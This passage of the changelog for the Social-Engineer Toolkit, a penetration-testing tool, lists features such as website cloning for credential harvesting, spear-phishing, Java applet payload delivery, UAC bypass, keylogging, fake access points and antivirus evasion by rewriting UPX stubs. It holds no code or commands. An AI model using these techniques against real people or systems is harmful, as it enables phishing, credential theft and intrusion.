an invalid number or non-numeric instance is given for input * Added more documentation around the core modules in the SET User_Manual * Updated the SET_User manual to reflect version 1.4 ~~~~~~~~~~~~~~~~ version 1.3.5 ~~~~~~~~~~~~~~~~ * Fixed a bug where create payload and listener wouldn't work for the new SET interactive shell or RATTE * Updated the SET User Manual for version 1.3.5 * Fixed the core.log(error) core library to properly log potential errors within SET * Updated the SET interactive listener to hold over nearly unlimited connections versus the 30 it was initially limited to * Turned the Java Repeater off by default, still a bit buggy, feel free to turn on if you want it * Added an automatic selection for the Sun Java Applet2ClassLoader Remote Code Execution to select java meterpreter since it is specific to the java meterpreter as a payload selection * Fixed alignment issues in the Metasploit attack vectors ~~~~~~~~~~~~~~~~ version 1.3.4 ~~~~~~~~~~~~~~~~ * Fixed a bug where from src.core.core import * would cause an exception * Added the set-proxy addition that will allow you to configure a proxy when using SET * Added additional error handling in the SET web gui * Fixed an issue where set-proxy wasn't configuring the proxy on certain linux distributions * Added the Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability from the Metasploit Framework ~~~~~~~~~~~~~~~~ version 1.3.3 ~~~~~~~~~~~~~~~~ * Added keystroke_start command to the SET interactive shell * Added keystroke_dump command to the SET interactive shell * Fixed a bug where downloading a file wouldn't work properly * Added a socket timeout and unique identifier for connecting shells. Will stop non-SET shells from connecting and drop the socket if it isn't the interactive shell * Fixed a bug in keystroke_dump where interactive shell would not properly send signal back and cause a broke pipe error * Added lockworkstation command to the SET interactive shell. Useful for keystroke logging * Fixed a bug where the encoder was not properly handling the set interactive shell * The keystroke_start does not currently work if victim locks there screen due to not being fully injected into something that can monitor keystrokes, for example explorer.exe. Process injection will be coming soon. * Started converting sys.path.append core import modules to from src.core.core import * * Fixed a bug where multiattack would throw a port not defined if default was selected * Fixed a bug where harvester would through an exception if multiattack was used * Fixed a bug where web_server start would throw an exception if web server wasn't listening properly * Big stability update on how connections are handled and during times of error on keeping the connections alive * Fixed alignment on spear-phishing and client-side attack to align properly * Added better quit handling in the web attack vector specifically when cloning a website or in payload generator * Fixed a bug in create your own payload that would flag core not defined thanks Luca! * Fixed a bug in the webgui that the update everything would cause an exceptions error ~~~~~~~~~~~~~~~~ version 1.3.2 ~~~~~~~~~~~~~~~~ * Added a new feature to the SET interactive shell, grabsystem. Will allow you to elevate permissions on victi machine. Does not work on XP SP2 and below. * Fixed a bug where if grabsystem was called on with UAC bypass, the UAC-Safe shell would hang * Added better error handling of sockets and addresses in the socket handlers in the interactive shell * Updated the code base in the shell.binary to add the new grabsystem and add better error handling * Added default handling if listener port was nothing, defaults to port 443 now * Fixed a bug in how third party handlers responded to certain character sets * Slowly moving to __init__.py method as it's proper and easier than sys.path.append ~~~~~~~~~~~~~~~~ version 1.3.1 ~~~~~~~~~~~~~~~~ * Fixed a bug in the SET interactive shell that was causing it to fail if the pycrypto modules was not installed * Updated RATTE to include better handling of injection * Bug fix for the wireless attack vector not properly putting things in monitor mode * Added changes to the wifi attack where it detects if airmon-ng is installed first and uses the path, or uses the one built into SET * Added better error handling around the Python-crypto module * Fixed a problem where in the SET Interactive Shell upload would throw an exception if file wasn't found * Fixed a bug where upload would cause an exceptions error and not properly upload the file * RATTE now runs in the background without a command prompt popping up and automatically restarts firefox or IE no longer need to close / reopen * Fixed a major bug where quitting the SET interactive shell would not allow you to drop into other sessions * Added bypassuac to the SET interactive shell, this allows you to bypass the user access control in Windows Vista, Windows 2008, and Windows 7 fully patched * Added a ton of stability exception handling in case something goes wrong session will still be up * Added tab completion for commands that are available through the SET interactive shell * Added up arrow last command so you can reuse the last commands you had when you type something in * Added exception handling if you type a command in wrong, it will let you know the proper syntax * Fixed a bug where you would either quit or control-c during the list of shells and it would cause the victim machine's CPU to spike to 100 percent * Added the ability to see * UAC Bypassed * in the shell window if the bypassuac was successful on the system. * Added error message handling around the SET Interactive Shell commands, so for example if you type bypassuac it will prompt you for the right commands * Fixed a bug where ps would display an error 'pid' not defined * Fixed a bug where after executing the kill command on process, it would error out on next command saying "Confirmed Kill" base 10 error. * Updated RATTE to include better descriptions around what to do when a session has been established * Fixed a bug where multiattack would throw a site_cloned exceptions. * Fixed a bug where the new SET payload would not properly work with the multiattack vector * Fixed a bug where the new RATTE payload would not properly work with the multiattack vector * Fixed a bug where using site templates instead of site cloner would throw an exception if selected * Added an unrecognized command syntax for the SET interactive shell and removed accidential printing of command via the exec command ~~~~~~~~~~~~~~~~ version 1.3 ~~~~~~~~~~~~~~~~ * Updated the web-gui interface to reflect all new PDF exploits * Updated the web-gui interface to reflect all new client-side exploits * Added a new setup.py installer file for debian based systems only, will add manual install options later * Updated all of the powershell HID attack vectors to fix bugs and support multi-language support. Thanks padzero! * Added AES encryption to the socket communication, it requires Crypto.Cipher which is from the PyCrypto libraries. * Added python-crypto to the installer setup.py installation * Fixed web-gui alignment on new options so they match up properly to SET-interface * Added better error handling around the openssl python module if it isn't installed * Added download_file capabilities into the SET interactive shell. * Added upload_file capabilites into the SET interactive shell. * Added shell capabilties into the SET interactive shell. * Added ssh_tunneling capabilities into the SET interactive shell. You can tunnel any port you want to over ssh * Added a teensy Gnome wget payload thanks to Hugo Caron (y0ug)! * Fixed a bug in a menu where teensy payload return to menu would not return properly to main menu * Fixed a bug where the Mass Mailer Menu didn't properly return back to main menu when specified. * Added process list in the SET interactive shell. * Added process kill in the SET interactive shell. * Added dsniff to set_config as an option instead of ettercap, can use either one. * Added centralized logging in SET, log files will now be dumped to src/logs/set_logfile.log * Added logging to main SET interface, handles main SET interactive shell errors * Added logging to arp_cache.py file, handles arp cache errors * Added logging to hijacking.py file, handles dll_hijacking errors * Added logging to harvester.py file, handles credential harvesting errors * Added logging to payloadgen.py file, handles payload generation errors * Fixed a bug where if site wouldn't clone properly it would just exit SET, it now just returns back to main menu. * Fixed a bug where the new addition to dnsspoof would not properly kill dnsspoof when exiting SET, it now terminates when an exception is thrown * Added logging to web_server.py file, handles main SET web server errors * Added logging to spawn.py file, handles main spawn handles for SET * Added the ability to specify high priority during emails or not, thanks Jonathan Murray! * Added new core module libary called log(error) will centralize log messages through core function calls * Added the new Sun Java Applet2ClassLoader Remote Code Execution Exploit from Frederic Hoguin and jduck that was recently added to Metasploit * Moved version number to src/main/ instead of src root * Added the new RATTE payloads to SET that was created by Thomas Werth to circumvent firewall based restrictions. Awesome addition! * Added the new DSNIFF changes to the web gui to ensure that when the option is enabled in set_config it now gets picked up in web gui * Fixed a bug in web gui where if HTML/Plain wasn't specified, it would not properly run the answer file to launch the attack * Added the SET interactive shell to the Java Applet Attack Vector on the SET web-gui * Fixed a mishandling of OS.Error exceptions in spawn.py which caused SET to spit out a pexpect exceptions error when using KeyBoardInterrupt exceptions handler * Deleted the database directory under src, was no longer needed * Added the Sun Java Applet2ClassLoader Remote Code Execution by Frederic Hoguin and jduck to the web gui interface * Added RATTE to the SET Web GUI under the payload selection area, it's only to be used for the Java Applet attack. * Added the Adobe Flash Player AVM Bytecode Verification Vulnerability from the Metasploit Framework to SET * Added the Adobe Flash Player AVM Bytecode Verification Vulnerability to the SET web gui. * Added six more spear-phishing templates that can be found under the spear-phish attack menu * Added a new attack vector called the SET Wireless Attack Vector, this will create a fake access point and redirect all traffic to you * Added the ability to stop all services/processes started by the SET Wireless Attack vector, it is now under the options menu * Added the Thomas Werth RATTE module to third party modules as well as under the main payload section. Great example to tweak third party modules and add things. * Added airbase-ng to SET in case it is not installed. Thanks to Mister-X for the approval to include it into SET! * Added new wireless attack vector to the SET web gui, menus have been changed slightly * Added the new templates recently added to the SET web gui, they are under the spear-phish menu * Added a binary rewrite of UPX encoder stubs so that it randomizes a three character alphanumeric to remove UPX from the binary. A bit better obfsucation for A/V detection. * Fixed a bug where upx encoding wasn't working properly and wouldn't encode the right binary * Added a new core module called core.upx(path_to_file) which will automatically encode the file via upx and rewrite the UPX stubs with a three character alphanumeric stub ~~~~~~~~~~~~~~~~ version 1.2 ~~~~~~~~~~~~~~~~ * Rehauled a lot of manual reused code and defined them in function calls and classes in src/core. * Added the windows/fileformat/ms10_087_rtf_pfragments_bof to the Metasploit Client-Side Attack vectors. * Added the windows/fileformat/ms11_xxx_createsizeddibsection to the spear-phishing attack vector * Changed the default for UNC embed to OFF instead of ON, don't want SMB alarms going off on phishing attacks unless you know the port is open. * Dynamically import third party modules in the modules/ folder. You can now create your own modules and have them show up in the SET "Third Party Modules" menu * Added core system call meta_path() * Added core system call grab_ipaddress() * Added core system call check_pexpect() * Added core system call check_beautifulsoup() * Added core system call cleanup_routine() * Added core system call update_metasploit() * Added core system call update_set() * Added core system call help_menu() * Added core system call date_time() * Added core system call generate_random_string(low,high) * Added core system call site_cloner(website) * Added core system call meterpreter_reverse_tcp_exe(port) * Fixed an issue where the report generator would not render the html properly * Added core system call metasploit_listener_start(payload,port) * Added core system call start_web_server(directory) * Added core system call java_applet_attack(website,port,directory) * Added core system call teensy_pde_generator(attack_method) * Updated the user manual to reflect the SET v1.2 changes and add a custom module creation tutorial * Fixed an issue where it would throw an exception on central. not being defined, should be core. * Fixed a core error message in the spear phishing attacking vector * Fixed a bug in spear phishing where it would throw meta is not defined * Fixed an issue in creating your own payload/listener where a core error would not be defined * Added core system call windows_root() * Changed the ms11_xxx to ms11_006 to match Metasploit's new naming scheme for the exploit * Changed the ms11_xxx to ms11_006 to match Metasploit's new naming scheme for the exploit * Fixed a bug with the adobe pdf nojs exploit in the spear phishing * Added some changes to the Teensy WSCRIPT Payload to support Windows 7. Special thanks to Peter Osterberg * Added detection if facebook.com was entered it tries cloning https://www.login.facebook.com/login.php instead due to strange iframe issues with facebooks site (thanks Kevin) * Fixed an issue when trying to create a PDF embedded exe in spear phishing, thanks Cam! * Removed a large portion of code from the disitool functionality since the function calls DeleteDigitalSignature and CopyDigitalSignature are only used. ~~~~~~~~~~~~~~~~ version 1.1.1 ~~~~~~~~~~~~~~~~ * Added a new configuration option called UNC_IMBED which will embed UNC paths to the web_cloner attack method so when a victim browses to your site if 445 is open outbound, it will pass the Windows hashes to you automatically and still allow additional attacks * Added a new option in the Spear-Phishing attack vector to use the UNC file path attack vector to harvest LM credentials via the attack vector through the capture/smb Metasploit module. * Added an ignorecase statement to the credential harvester which wouldn't properly handle capitalized method=POST's, it now accepts either ~~~~~~~~~~~~~~~~ version 1.1 ~~~~~~~~~~~~~~~~ * Added a new configuration option AUTO_REDIRECT=ON/OFF, this will turn off automatic redirects once the payload is successful. This works for Java Applet. * Fixed wording on the AUTO_DETECT=OFF prompting, it was a bit confusing. * Changed the old IE exploit ms_xxx_ie_css_clip to reference the update in Metasploit to ms10_090_ie_css_clip * Added a handler for stale processes when closing SET. It should now close any lingering threads or processes when exiting. * Added the Internet Explorer CSS Import Use After Free exploit by JDuck from Metasploit * Added the Foxit Pro PDF buffer overflow exploit from Metasploit. * Added the Nuance PDF buffer overflow exploit from Metasploit. * Cleaned up the smtp sending code with better definitions and function calls * Optimized heavy portions of code to make SET run much faster including the web server * Added the Microsoft WMI Administration Tools ActiveX Buffer Overflow exploit into the browser exploit section * Added better description handlers around set-updates, set-web, set-automate, and inside the main set files * Added central.py to main system files, this will be the home of the central calls and definitions through SET going forward * Added a new addition to add UPX encoding if you have UPX installed somewhere within the SET_CONFIG, adds better AV evasion ~~~~~~~~~~~~~~~~ version 1.0 ~~~~~~~~~~~~~~~~ * Added the new set-automate functionality which will allow you to use SET answer files to automate setting up the toolkit * Added bridge mode to Ettercap if you want to utilize that capability within Ettercap * Fixed an issue where multiple meterpreter shells would spawn on a website with multiple HEAD sections in the HTML site * Added the Metasploit Browser Autopwn functionality into the Metasploit Attack Vector section * Fixed the dates on DerbyCon, suppose to be September 30 - Oct 2 2011 instead of Septemeber 29 - Oct 2 2011 * Added the ability to utilize templates or import your own websites when using credential harvester, tabnabbing, or webjacking * Fixed an integer error issue with Java Applet when exiting SET * Changed the timing for the wscript payload from 15 seconds to 10 seconds to minimize delay * Added a custom written DLL for SET and the DLL Hijacking, user has to extract the zip file for it to work properly * Redid the report templates for credential harvester to reflect the new look for secmaniac.com * Removed the modified calc.exe and replaced with a modified version of putty.exe to get better AV detection * Redid the dll hijacking attack to include rar and zip files, rar is better to use winzip compatible and will execute * Added an additional dll hijacking dll that will be used for the main attack, uses a purely C++ native method for downloading and executing payloads * Fixed the defaulting application for the Client-Side attack vector, it was defaulting to PDF when it should be an IE exploit * Fixed a bug where hitting enter at the web attack vector would cause an integer base 10 error message * Added the Adobe Shockwave browser exploit that I wrote for the Metasploit Framework. * Moved all of the SET menu mode source to main/set.py, the main set loader is just a small import now. More clean. * Changed some spacing issues in the client-side attack vectors * In spear-phishing, cleaned up excess messages being presented back to the user when PDF was created or files were moved * Fixed a bug in the web cloner where certain ASPX sites wouldn't clone and register properly, thanks for the patch Craig! Added you to credits. * Added the SMS attack vector which can spoof SMS messages to a victim, it will be useful in nature if you want them to click a link or go somewhere you have a malicious site. Thanks to the TB-Security.com for the addition. * Added the Metasploit Sun Java Runtime New Plugin docbase Buffer Overflow universal client side attack * Added the parameter for the java applet called separate_jvm, this will spawn a new jvm instance so cache does not need to be cleaned * Fixed a bug where the SET Python web server would not properly shut down in certain circumstances * Added a repeatitive refresh flash for the java applet, so if a user hits cancel, it will prompt over and over until run is hit. Better way of getting the user to hit run. * Added the configuration option to turn off the java repeater, so if your using something like multi-attack you can specify so it doesn't keep nagging the user if you want multiple attack vectors * Fixed a bug where spear phishing attack would not spawn meterpreter listener when yes was specified, this was caused by the new dll hijacking addition. * Added better connection handling through the spear-phishing and gmail integration, it wasn't properly closing the connection per request * Fixed bug where using infectious media and file format would prompt you to use the spear-phishing mailer option afterwards, it no longer prompts for that during infectious media creation * Removed the option to include how many times to include, automatically defaults to 4, option is configurable in set_config now * Added the Metasploit Adobe FlashPlayer "Button" Remote Code Execution exploit to the spear-phishing/file format attack vectors * Added the ability to hit enter on yes or no payload selection default to the infectious usb method, enter would just return you to the menu, it now spawns a listener * Removed the return to continue prompt in the Teensy HID USB attack vector, it wasn't needed and added additional steos * Added the new SET web interface, it primarily utilizes the new set-automate functionality based on responses for a payload, will improve as time goes on * Added the reverse DNS meterpreter payload to both client-side attacks as well as payload generators for things like Java Applet, Teensy, attacks, etc. * Fixed an issue where the Adobe 'Button' exploit was not properly loading and exporting the PDF through Metasploit * Added the Internet Explorer CSS Tags Memory Corruption exploit to the Metasploit Client-Side attack vector through web attack. * Fixed a large bug within mass mailer, if you were using Google Mail with multiple targets, there was a mis-matched counter that would only send one email, not to the rest of the list. It now functions correctly * Fixed a bug where if you turned sendmail to off and you used open mail relays, the email wouldn't be delivered properly. It now sends as expected * Added javascript replacement of the ipaddress under name in Java Applet, this is configurable under set_config, it defaults now to Secure Java Applet instead of your IP Address (more believable) * Added the ability to change the bind interface for the command center. By default its on localhost only, but you can configure to listen on all interfaces and hit the web interface remotely. * Updated the SET User Manual to reflect the changes of version 1.0, it incorporates the web interface, set-automate, SMS spoofing, new configuration options, and much more. * Fixed a bug where you would leave SET or still be in and a stale HTTP web server process would still be there. SET now checks to see if the process is stale and terminates it. * Added the ability to toggle different shell terminal windows within the command-center. For example you can select XTERM, KONSOLE, and GNOME through the set_config. XTERM will be the default. * Fixed where the repeater and java applet wouldn't properly work if you used your own template or ones built into SET * Added a new set_config option for the timing around java-repeater. You can set the seconds for it to repop if you want to tune. Default is 200 (2 seconds) * Added a default option in Java Applet attack, if you hit return for targetting Linux/OSX it will default to port 8080 and port 8081 for the listeners * Fixed a small menu bug within client-side attack, the menus wouldn't line up properly * Added a patch from Thomas Roth to fix a bug in the java_applet pde file for the Teensy attack vector * Fixed a bug where site would not clone properly or inject iframes in certain websites, it was due to lack of proper regular expression filters, this has been corrected * Added better detection on site cloner to handler
tags with java applet that aren't standard, for example
* Fixed a pervasive bug that has been around since 0.3 which when running SET and the python web-server, if you exited you would have to wait a period of time to relaunch because of the TIME_WAIT flag on the socket. After some recoding of the web-server, the socket can be rebound with the TIME_WAIT flag still in play and still function normally * Added better detection on site cloner to handler
tags with metasploit browser attack. There were times where the site would clone but not properly inject iframes into the head tags. This has been resolved in both single metasploit client-attack and multiattack * Changed iframes to to fix bugs within MSF-based payloads. They die if iframes are utilized for some reason. Thanks Matt! * Added a new configuration flag that turns autoscript migrate -f on metasploit based payloads, new flag is AUTO_MIGRATE=OFF/ON * Added better error handling in the main set loader, was throwing proc errors every so often * Added a new flag within the set_config called digital_signature_steal which incorporates Didier Stevens digital signature stealing tool called disitool * Added an addition to the docbase exploit, if the exploit is selected, framesets are used for the attack vector because with iframes it completely bombed, this was a funky workaround * Added a new configuration flag to turn persistence on with Metasploit's Meterpreter if you want it * Removed persistence configuration option, it will be shortly replaced by a much more flexible configuration * Added a new config option that allows you to specify a multiscript meterpreter command. In cases where you use SET and maybe your sleeping or you aren't there, you can piggy back script execution on a meterpreter session connection. For example you could run persistence, or run other scripts that help aid your effort on the penetration test. * Fixed a bug where import your own payload would not properly work within the java applet * Fixed a bug where meterpreter multi scripts was not properly defined within metasploit client-side attacks and would throw an exception * Fixed an import error issue with base64 when sending base64 encoded emails through multiple email medians * Added the ability to customize what port the metasploit browser attack runs on, by default its on 8080 however this is now customizable through the set_config * Fixed a base 10 error message within SET in the Web attack menu, if you did not input an integer it would error out giving a base 10 error message, it now returns to the prior menu as expected * Added better executable obfuscation on the filename when the Java Applet triggers, it use to be static to java.exe, now its a randomized executable name. * Changed the client side attack to default to the docbase buffer overflow instead of the xss vulnerability, more universal in nature * Added some more comments in the set_config file for confusion around the self-signed java applet functionality * Fixed a bug where the Java Repeater on some systems would not properly forward off to the legitimate cloned website when run was hit, seemed to affect Windows XP in certain scenarios, this has since been corrected and properly addresses the legitimate site after run has been executed * When using option 4, it would ask for two IP addresses with AUTO_DETECT=OFF, this has been changed to only flag to one question since the listener binds to 0.0.0.0 (all interfaces) * Turned digitial signature stealing ON by default, it will just default back to normal if it doesn't detect the pefile import * Changed wording to reflect reverse dns as a hostname not tunneling over DNS, was wrong description ~~~~~~~~~~~~~~~~ version 0.7.1 ~~~~~~~~~~~~~~~~ * Added the ability to use fileformat exploits in the USB/DVD/CD Infectious Attack Vector * Fixed a couple of wording issues in the client-side attack vector payloads section * Added Meterpreter SSL connection payload for client-side attacks * Added Meterpreter SSL connection payload for fileformat attacks * Added Meterpreter SSL connection payload for browser attack vectors * Fixed an issue with the utilprint exploit in the file format attacks * Added the Metasploit PDF embedded executable fileformat exploit with no javascript * Fixed a bug where equal signs would throw the website off and cause an error cloning * Updated the user manual to reflect the latest changes in 0.7.1 ~~~~~~~~~~~~~~~~ version 0.7 ~~~~~~~~~~~~~~~~ * Fixed the NAT/Port FWD descriptions to be a little bit more descriptive * Bug fixes on payload gen with x64 bit payloads in Metasploit * Added new Multi-Attack Payload option to utilize multiple attack vectors * Incorporated Multi-Attack into each web attack vector * Added a PID management system in SET for stray processes * Cleaned up payloadgen code and SET code to reflect new multiattack changes * Added the web jacking attack vector by white_sheep, emgent, and the Back|Track team * Fixed an issue with ARP Cache defaulting, it should now poison everyone * Added better error handling within the SET menus, still needs a bit more work * Cleaned up color schema and removed old code * Added the Adobe CoolType SING Table 'uniqueName' Overflow zero day from Metasploit in spear phishing * Added two more Teensy based payloads, thanks Garland! * Added HTML support for Spear-Phishing Attack Vector * Added HTML support when WEBATTACK_EMAIL=ON for web attack vector * Added the Adobe Cooltype SING Table Overflow zero day for browser exploit * Added the new SET User Manual to readme/. This is a big update and has updated content for 0.7 * Fixed a simple yes or no answer when requirements for SET were not met * Removed a control-c option if multi-attack was specified for harvester * Added a check for APACHE_SERVER and multi-attack. Will now throw an error since it's not supported yet ~~~~~~~~~~~~~~~~ version 0.6.1 ~~~~~~~~~~~~~~~~~ * Added the ability to utilize SSL with credential harvesting or tabnabbing attack, you can import your own PEM files or utilize self-signed (SET creates for you) * Fixed the lnk exploit path since it changed within Metasploit * Added -n to disable database support (not needed for SET) * Added cgi.escape to filewrite output to remove a local XSS attack that could happen on credential harvester/tabnabbing attack * Added -L to remove error messages when using other platforms outside of standard Linux OS (i.e. osx, ipad, iphone) * Fixed reverse VNC from not properly executing with DisableCourtesyShell * Fixed issue where teensy.pde would not properly write out if no handler was specified * Added the latest Metasploit Hijacker DLL exploit (zero day) * Bug fix in Java Applet backdoored executable, for some reason EXE was getting corrupt with latest Metasploit updates * Removed the encoder option in msfconsole, no longer needed * Changed numbering on Metasploit Client-Side Attack vector * Fixed an issue with webdav Metasploit based exploits not deploying right when using 8080 as an alternate port * Added more extenstions to the DLL Hijacking issue * Removed an old print statement in cloner.py * Added the download/exec payload in the Metasploit exploit attack vector, you can now download/exec payloads * Added the ability to set the port on reverse through Metasploit client attacks * Added Metasploit's allports payload to Metasploit exploit attack vector * Added a display message for the teensy output to ensure to select usb/keyboard in tools + board in Arduino * Fixed a bug with site cloner that would not properly clone a site on some operating systems * Fixed a bug that would cause java applet not to work based off of a bad subversion update * Added the ability to utilize SET with Port Forwarding/NAT where your IP may be different from the reverse listener, it will prompt now when AUTO_DETECT is set to OFF * Added better obfuscation for the downloader, no longer needs an .EXE extension, it rewrites on the fly to the OS for better IPS/IDS evasion * Added a couple changes to the Java Applet source code and added a small tool for compiling it * Added method=post for detection on html for the credential harvester method * Added the Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution exploit into the Metasploit Client-Side attacks ~~~~~~~~~~~~~~~~~ version 0.6 ~~~~~~~~~~~~~~~~~ * Number of bug-fixes through SET and better error handling * Added the tabnabbing attack vector * Added favicon pulling per site on tabnabbing * Fixed dynamic import bug with reloading modules after use * Added Man Left in the Middle (MLITM) from Kos * Added the latest IE and Adobe exploits * Rewrote the HTTP web server handler for WebDav based exploits, it will force SET to use port 8080 as the web server as MSF requires WebDav on 80. * Rearranged the initial web attack vector menu, it needed to be reversed * Added the ability to specify your own custom executable for MSF encoding (-x) within the config/set_config file, the new option is called 'CUSTOM_EXE' * Added checks for BeautifulSoup, it is now a requirement for SET for the MLITM attack * Fixed the no encoding issue with Java Applet Attack Vector, when specifying no encoding it will not prompt you to encode the payload * Fixed bleed over colors when bombing out of any of the SET menus * Added the ability to be able to customize MLITM web server port address in set_config, default is 80. * Fixed an issue with Java Applet attack where if WEB_PORT was changed from 80, the Windows and NIX payloads would not deploy properly based off of port change * Fixed an issue where importing your own executable with the Java Applet attack would fail and not work properly * Fixed where OSX and LINUX payloads would still be asked for in payloadgen if not using the Java Applet attack * Added the new Teensy Arduino attack vector menu that can be used with the Teensy USB HID devices that can bypass autorun disabled for physical/social-engineering attacks * Fixed issue where ettercap was not properly performing DNS_POISON attacks, should now dns poison properly * Removed the IP address challenge question when importing your own exe * Fixed issue where other python applications would close when exiting SET * Rewrote html handler to fix stderr and stdout issues with subprocess and ettercap handlers, should close properly when exiting SET now * Fixed the main bug with Linux/OSX via Java Applet and no shell being piped, should now be 100 percent operable * Fixed issue where VNC courtesy shell would still be present even when disabled * Thomas Werth Java Applet is now open source, can be found under src/java_applet * Fixed a bug where credential harvester would clone a website twice * Fixed an issue where some sites would not properly rewrite with the credential harvester * Added the ability to automate the payload deployment through Teensy * Added the ability to use Apache with the Teensy attach vector or the built-in SET server * Fixed a bug where if an invalid response was given in PEXPECT installation, it would continue and cause issues when the requirements were not met * Changed the MS10-042 to reflect the MSF changes windows/browser/ms10_042_helpctr_xss_cmd_exec * Added the MS10-XXX LNK file exploit from Metasploit, is now incorporated into the Client-Side Attack vector * Added defaults to the client-side attack vector, so just hitting return will default to meterpreter and the latest exploit * Removed the ability to perform tabnabbing and web templates, only clone method supported * Fixed when webdav is being used the HTTP 8080 server of the cloned site wouldn't run properly * Fixed when client-side attack exploit windows/browser/ms10_042_helpctr_xss_cmd_exec would fail and not load properly through webdav * Fixed issue where Apache and python-based web server was not properly running under Teensy USB HID attack * Changed name from Infectious USB/DVD/CD to Infectious Media Generator * Fixed a bug with the Java Applet attack vector where Apache mode wasnt working properly * Fixed the BeautifulSoup response to ensure it fails out if invalid responses are given * Fixed an issue where BeautifulSoup and PExpect would not clean up properly after installation * Changed timing on Teensy PowerShell/WSCRIPT attack method to be faster ~~~~~~~~~~~~~~~~~ version 0.5 ~~~~~~~~~~~~~~~~~ * Added better FireFox user agent impersonation through web cloner * Rehauled the entire web_server to handle multiple request types (ie POST) * Removed the single host target for Ettercap and allow you to DNS poison the entire network now for a larger capability for the attack. * Rehauled the Ettercap functionality to allow entire network ranges for select websites or any websites * Removed the certificate check for FQDN mismatches, no need to keep them in when cloning site * Added a whole new attack method through the web cloning, this will allow you to clone a website with username and password fields and automatically harvest those credentials. * Added a reporting engine to the credential harvest, looking at expanding to other attack methods. * Added more description to the payload creation option within SET and moved it to the root SET directory * Added the ability to utilize predefined templates within the SET web attack now, and expanded it to multiple templates * Added the ability to utilize backdoored executables (-x) in MSF to better get around A/V. This option is available through all of the payload generation capabilities. * Added XML based format for the report export in the website harvester, pretty simple xml format for anyone that needs it * Added CD/DVD/USB infectious method, will allow you to create a simple autorun.inf you can burn and use in an se attack * Fixed bug when reloading a menu after previously loaded * Fixed bug where credential harvester server would not properly terminate when issuing Contorl-C * Fixed bug where when cloning certain sites it would duplicate the payload and execute twice * Fixed where aurora exploit was changed in MSF but not in SET * Fixed iepeers description in msf and removed win32hlp exploit * Added the ability to import your own PDF now in the Spear Phishing menu * Moved around the changelog to reflect newest changes first in the changelog * Added the MS10-018 IE Tabular ActiveX Memory Corruption Exploit * Changed update_set to set-update * Added robust checking for custom PDF in spear-phishing attack, if no file is found it will default. * Added defaults to spear-phishing attack menus * Added the ability to just use the mass mailer options by itself without having to do it through an attack vector * Fixed bugged when using the payload creation, would cause corrupt executable * Fixed when a server was already bound to 80 in harvester and error message was not displayed properly * Fixed a major bug with the credential harvester, should POST and redirect properly now. * Added automigrate to payloads so when the user closes the browser, it doesn't close the active session. * Fixed bug in infectious usb method where payload was corrupt * Used a non-console application for -x flag in msf, causes there to be no popup now * Added better path detection for iTouch * Added compatibility with iPad, iTouch, iPhone, etc. etc. * Added an interface IP when AUTO_DETECT=OFF to detect both reverse IP and interface IP in scenarios where the interface IP will be different from the listener IP ~~~~~~~~~~~~~~~~~~ version 0.4.1 ~~~~~~~~~~~~~~~~~~ * Added multi-encoder options by default and option 15 in the web attack, this is much better for A/V bypassing. * Added the meterpreter ALL PORTS egress attack which slowly connects to every port in order to find one that works * Fixed a couple wording changes that may be confusing * Fixed issue where HTTPServer was not properly closing when exiting SET * Over 25 different menu bug fixes * Added mass obfuscation of payload delivery in the Java Applet, should make harder for signatures to be written * Fixed a bug where web server would not properly quit if you did not fully exit SET * Fixed a bug where the new multi-encoder would not properly be specified when using the 15 number option on web attack * Added the latest IE F1 VBScript exploit to the web attack vector * Added the latest IE Insecure Scripting Misconfiguration attack to web attack vector * Removed the option when creating emails to create the payload now * Added a default to port 443 if null is specified during email attack * Added the ability to customize the web server listening port so it isn't always listening on 80 if you dont want it to * Added the ability to auto detect IP addresses for RHOST within spear phishing controlled through SET_CONFIG and AUTO_DETECT=ON/OFF * Added the ability to create a one time email attack or import the template, don't always have to create a template now * Added default payload if null is specified during email attack * Bug fix on cloning certain websites with no .extension prefix, thanks JWYNN! * Fixed where https wasn't parsed properly when cloning website * Added the iepeers zero-day from MSF to SET * Added the ability to use import your own site with cred harvester ~~~~~~~~~~~~~~~~~~ version 0.4 ~~~~~~~~~~~~~~~~~~ * Incorporated Thomas Werth's unpublished Java Applet attack that no longer utilizes VBS script and is multi platform including Linux, Windows, and OSX. * Allow you to now self-sign your certificates from whatever you want, will need to install openjdk-6 before using this though, edit the set_config to enable this feature. * Fixed bug where newlines were not showing up properly when emailing something * Fixed bug where GMAIL sometimes requires TLS, it will detect if TLS is needed and utilize this * Rewrote the majority of the web server handler, now utilizes forked simplehttpserver in python and can dynamically import anything now, much easier method for handling multiple files now. * Added two payload delivery options for OSX and Linux in the Java Applet attack, you can now select if you want to create a Lin/OSX payload and have them deployed via the Java Applet. Currently only supports reverse_tcp shells. * Bug fixed template creation where when it dynamically imported newlines would be messed up. * Based on Hak5 and Mubix, I have changed it so that the website and listener is up and running before the emails are sent out. I simply create a child thread that interacts in the background and if the set_config option for WEBMAIL_ATTACK=ON, it will call that variable and allow you to send emails out while the listener and website runs in the background. As soon as your finished with the email, it will then interact with the child process and allow you to interact. * Added Metasploit browser exploits into the website attack vector, this will allow you to utilize the web cloning or pre-defined template in SET and select either a Java Applet method, or Metasploit Browser exploits. * Minor wording change in the payload gen, it said choice 1-4 where the choice was 1-8 * Fixed the import your own executable or payload within payloadgen * Fixed the solo payload and listener option (number 5) * Fixed a number of bugs on the interface, thanks to everyone for reporting * Added OSX support to SET, web clone should now fully work * Fixed a couple of bugs where the website wouldnt properly clone if it was php or asp ~~~~~~~~~~~~~~~~~~~ version 0.3 ~~~~~~~~~~~~~~~~~~ * Added x64 payloads for website attack * Added select your own executable for website attack * Added option to clone an entire website and inject applets into them * Fixed a few minor bugs with payload selection * Allow you to specify "0" for encoding without erroring out * Moved the SENDMAIL flag to the set_config instead of its own config file * Added much more description on how to modify the set_config file in the file itself * Moved CREDITS to readme instead of the credits folder * Incorporated a skip for encoding if x64 based * Allow you to import your own website into SET for web attack * Added adobe flatdecode predictor02 integer overflow exploit from MSF * Fixed a couple of menu bugs where it wouldn't properly exit * Added better error handling * Added the adobe newMedia zero day adobe pdf attack for emails * Templates are now dynamically imported into SET, you can add your own email templates now through the templates folder in the set root or you can enter them through SET itself. * Fixed a bug with ARP_Cache poisoning not working if set to ON * Made Shikata_Ga_Nai the default for web attack * Added x64 Meterpreter compatibility with web attack * Fixed bugs in custom exe to vba via rar delivery * Added more payload delivery options to email attack including x64 bind, reverse, and meterpreter * Added automatic encoding options for the VBA to EXE attack via E-Mail * Added a flag option in set_config for ettercap to 